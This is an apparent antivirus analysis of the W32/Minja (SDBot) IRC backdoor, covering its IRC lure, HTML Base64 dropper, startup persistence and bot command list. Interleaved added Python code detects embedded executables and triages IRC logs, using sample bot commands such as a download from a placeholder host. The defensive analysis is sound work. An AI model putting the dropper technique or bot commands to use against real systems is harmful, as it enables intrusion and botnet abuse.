W32/Minja

Analysis

  • Detection included in Fortinet Virus Update July 2 2003
    Firmware 2.30 AV definition 4.100
    Firmware 2.36 AV definition 4.100
    Firmware 2.50 AV definition 4.100
  • The virus is a 32-bit executable with a compressed size of 23,110 bytes – it may be encoded within an HTML document packaged inside a .ZIP file named “Mindjail.zip” – the .ZIP carries these comments –
    Im lame, but im not a kiddie heh
    =]
  • The virus may have been posted as a link in IRC channels or sent as a message to IRC users in this format –
    <xxxxxxxxx> EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://XX.XX.XX.XX:3030/mindjail.zip
    In the above message, “xxxxxxxxx” represents a string of nine random letters – the hyperlink pointed to an infected computer
  • If the .ZIP file is downloaded, it may contain an HTML file named “mindjail.html” with a file size of 32,907 bytes – the HTML file contains a Base64-encoded binary which is decoded and launched by script within the HTML file – the binary may be launched without user interaction
  • If mindjail.html is opened, the binary may be written to the local machine as “javax.sun.base.exe” – in the bottom of the Internet Explorer browser pane, the message “Installing components…java.sun.base.exe” may be visible – text is also displayed in the browser window with reference to “Mindjail” as in this excerpt from that display –
    MINDJAIL
    Eworethom is trapped - in mindjail.... Mindjail is a trap - its a thought that you just cant get out of your head..E-thoms Mindjail is that he cannot escape a mysterious invisible box which he calls "Satans Box".
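The drop technique described in the preceding bullets (a Base64 blob inside an HTML page that script decodes and writes out as an executable) can be caught by decoding long Base64 runs and checking for an MZ header. The following is an added example and not code from the original analysis or from Fortinet: the sample page, its `writeFile`/`decode` calls and the stub "binary" are all constructed for illustration, and the indicator names are this example's own.

```python
import base64
import re

# Constructed sample of the lure structure described in the analysis: an HTML
# page whose script decodes a Base64 blob and writes it out as an executable.
# The "binary" is a harmless stub carrying only the MZ header, not malware.
FAKE_PE = b"MZ" + b"\x90" * 62 + b"This program cannot be run in DOS mode." + b"\x00" * 200
SAMPLE_HTML = (
    "<html><body><h1>MINDJAIL</h1>\n"
    "<script>\n"
    'var blob = "' + base64.b64encode(FAKE_PE).decode("ascii") + '";\n'
    'writeFile("javax.sun.base.exe", decode(blob));  // hypothetical dropper call\n'
    "</script></body></html>\n"
)

# Constructed benign page: a large Base64 blob that is merely an inline PNG image.
FAKE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 56
BENIGN_HTML = '<img src="data:image/png;base64,' + base64.b64encode(FAKE_PNG).decode("ascii") + '">'

# A run of Base64 alphabet long enough to be worth decoding (64+ chars).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")
# File names ending in .exe, as they would appear in a dropper's script.
EXE_NAME = re.compile(r"[\w.-]+\.exe", re.IGNORECASE)
# The lure text the analysis quotes from the rendered page.
LURE_MARKER = re.compile(r"mindjail", re.IGNORECASE)


def find_embedded_executables(html: str) -> list:
    """Decode every long Base64 run and report the ones that start with 'MZ'."""
    findings = []
    for m in B64_RUN.finditer(html):
        try:
            data = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if data.startswith(b"MZ"):
            findings.append({"offset": m.start(), "size": len(data)})
    return findings


def assess(html: str) -> list:
    """Return the indicator names present, in a fixed order, for triage."""
    indicators = []
    if find_embedded_executables(html):
        indicators.append("base64_pe_blob")
    if EXE_NAME.search(html):
        indicators.append("exe_filename_in_page")
    if LURE_MARKER.search(html):
        indicators.append("mindjail_marker")
    return indicators


if __name__ == "__main__":
    for name, doc in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, assess(doc), find_embedded_executables(doc))
```

The inline-image page shows why the check decodes before deciding: a long Base64 run alone is common in legitimate HTML, while a run that decodes to an MZ header next to an .exe file name in script is not.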
  • When the file “java.sun.base.exe” is run, it may copy itself as the file “HPSCHED.EXE” into the Windows\System folder and modify the registry to load at Windows startup
  • The written file is a variant of the remote access Trojan known as “SDBot”
  • The Trojan connects with an IRC channel and awaits commands from a hacker or group of hackers – the Trojan can accept the following commands –
    Action - Shortcut
    about - "ab"
    action - "a"
    addalias - "aa"
    aliases - "al"
    c_action - "c_a"
    c_join - "c_j"
    c_mode - "c_m"
    c_nick - "c_n"
    c_part - "c_p"
    c_privmsg - "c_pm"
    c_quit - "c_q"
    c_raw - "c_r"
    c_rndnick - "c_rn"
    clone - "c"
    cycle - "cy"
    delay - "de"
    die - "d"
    disconnect - "dc"
    dns - "dn"
    download - "dl"
    execute - "e"
    id - "i"
    join - "j"
    killthread - "k"
    log - "lg"
    logout - "lo"
    mode - "m"
    netinfo - "ni"
    nick - "n"
    nldump - "nld"
    open - "o"
    part - "pt"
    ping - "p"
    prefix - "pr"
    privmsg - "pm"
    quit - "q"
    raw - "rw"
    reconnect - "r"
    redirect - "rd"
    remove - "rm"
    repeat - "rp"
    rndnick - "rn"
    server - "se"
    spam - "spm"
    spy - "sp"
    status - "s"
    syn - "syn1"
    sysinfo - "si"
    threads - "t"
    udp - "u"
    update - "up"
    visit - "v"
    worm - "worm"
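The command vocabulary above, together with the IRC lure format quoted earlier, gives a defender two things to look for in IRC traffic or proxy logs: messages carrying a link to mindjail.zip, and channel messages that begin with a command prefix followed by one of the bot's command words. The following is an added example, not code from the original analysis or from Fortinet. It assumes a "." command prefix (the analysis lists a `prefix` command but does not say what the default is), the log lines are constructed rather than captured, and the high/low severity split is this example's own triage choice.

```python
import re

# Command vocabulary of the bot as listed in the analysis (name -> shortcut).
SDBOT_COMMANDS = {
    "about": "ab", "action": "a", "addalias": "aa", "aliases": "al",
    "c_action": "c_a", "c_join": "c_j", "c_mode": "c_m", "c_nick": "c_n",
    "c_part": "c_p", "c_privmsg": "c_pm", "c_quit": "c_q", "c_raw": "c_r",
    "c_rndnick": "c_rn", "clone": "c", "cycle": "cy", "delay": "de",
    "die": "d", "disconnect": "dc", "dns": "dn", "download": "dl",
    "execute": "e", "id": "i", "join": "j", "killthread": "k", "log": "lg",
    "logout": "lo", "mode": "m", "netinfo": "ni", "nick": "n", "nldump": "nld",
    "open": "o", "part": "pt", "ping": "p", "prefix": "pr", "privmsg": "pm",
    "quit": "q", "raw": "rw", "reconnect": "r", "redirect": "rd",
    "remove": "rm", "repeat": "rp", "rndnick": "rn", "server": "se",
    "spam": "spm", "spy": "sp", "status": "s", "syn": "syn1", "sysinfo": "si",
    "threads": "t", "udp": "u", "update": "up", "visit": "v", "worm": "worm",
}
SHORTCUT_TO_NAME = {short: name for name, short in SDBOT_COMMANDS.items()}

# Triage choice made for this example (not from the analysis): commands that
# fetch or run code, or drive floods and spreading, are rated high.
HIGH_RISK = {"download", "execute", "update", "open", "visit",
             "syn", "udp", "spam", "clone", "redirect", "worm"}

# ":nick!user@host PRIVMSG target :text" (the user@host part is optional).
PRIVMSG = re.compile(r"^:(?P<nick>[^!\s]+)(?:!\S+)?\s+PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$")
# The lure the analysis describes: a link to mindjail.zip on an infected host.
LURE_URL = re.compile(r"https?://\S+?/mindjail\.zip\b", re.IGNORECASE)
# The analysis notes the lure sender's nick is nine random letters.
NINE_LETTERS = re.compile(r"[A-Za-z]{9}")


def parse_privmsg(line):
    """Return (nick, target, text) for a PRIVMSG line, else None."""
    m = PRIVMSG.match(line.rstrip("\r\n"))
    return (m["nick"], m["target"], m["text"]) if m else None


def triage_irc_log(lines, prefix="."):
    """Flag lure messages and prefixed bot-command words (prefix is an assumption)."""
    alerts = []
    for line in lines:
        msg = parse_privmsg(line)
        if msg is None:
            continue
        nick, target, text = msg
        lure = LURE_URL.search(text)
        if lure:
            alerts.append({"kind": "lure", "nick": nick, "target": target,
                           "url": lure.group(0),
                           "nine_letter_nick": NINE_LETTERS.fullmatch(nick) is not None})
            continue
        if not text.startswith(prefix):
            continue
        words = text[len(prefix):].split()
        if not words:
            continue
        word = words[0].lower()
        name = SHORTCUT_TO_NAME.get(word) or (word if word in SDBOT_COMMANDS else None)
        if name:
            alerts.append({"kind": "command", "nick": nick, "target": target,
                           "command": name,
                           "severity": "high" if name in HIGH_RISK else "low"})
    return alerts


# Constructed log lines (not captured traffic); the first mirrors the lure
# format quoted in the analysis, with its placeholder address kept.
SAMPLE_LOG = [
    ":abcdefghi!u@XX.XX.XX.XX PRIVMSG #chat :EEEEEEETHHHOOOM! MINDJAIL!! HE IS TRAPPED!! GET HIM OUT! http://XX.XX.XX.XX:3030/mindjail.zip",
    ":alice!a@host PRIVMSG #chat :anyone seen the new patch?",
    ":herder!h@host PRIVMSG #botnet :.dl http://XX.XX.XX.XX/XXXX",
    ":herder!h@host PRIVMSG #botnet :.si",
    "PING :irc.example.invalid",
    ":bob!b@host PRIVMSG alice :.a just kidding",
]

if __name__ == "__main__":
    for alert in triage_irc_log(SAMPLE_LOG):
        print(alert)
```

The last sample line shows the main source of noise: many shortcuts are a single letter, so ".a" in ordinary chat is reported as `action` at low severity. In practice the single-letter matches are worth keeping only when the same nick also issues multi-character commands or the channel is otherwise suspect.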

Telemetry